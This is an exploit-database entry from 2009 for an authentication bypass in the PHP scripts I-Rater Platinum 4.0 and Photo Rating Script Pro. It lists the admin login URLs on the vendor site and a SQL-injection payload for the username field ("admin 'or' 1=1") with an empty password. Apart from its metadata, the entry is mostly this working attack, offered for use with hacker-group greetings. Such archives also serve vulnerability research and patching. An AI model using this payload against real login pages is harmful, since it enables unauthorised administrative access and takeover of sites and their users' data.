EXPLOITS

I-Rater Pro/Plantinum 4.0 - Authentication Bypass

Author: Hakxer
type: webapps
platform: php
port: 
date_added: 2009-04-20  
date_updated:   
verified: 1  
codes: OSVDB-53896;OSVDB-53895  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8508.txt  

################################################
###########  I-Rater Platinum V4 ###############
##### By : Hakxer
##### Greetz : ExH , ProViDoR , Error Code , Bright D@rk , Stealth , Kof2002 , Data_fr34ck3r , HcJ , Virus_hima
########## I-Rater Platinum V4 (Auth bypass) Sql injection

poc :

http://www.i-rater.com/platinumadmin.html

in username : admin 'or' 1=1
in password :
###############################

################################################
###########  Photo Rating Script Pro ###########
##### By : Hakxer
##### Greetz : ExH , ProViDoR , Error Code , Bright D@rk , Stealth , Kof2002 , Data_fr34ck3r , HcJ , Virus_hima
########## Photo Rating Script Pro (Auth bypass) Sql injection

poc :

http://www.i-rater.com/pro/admin/login.php

in username : admin 'or' 1=1
in password :
###############################

# milw0rm.com [2009-04-21]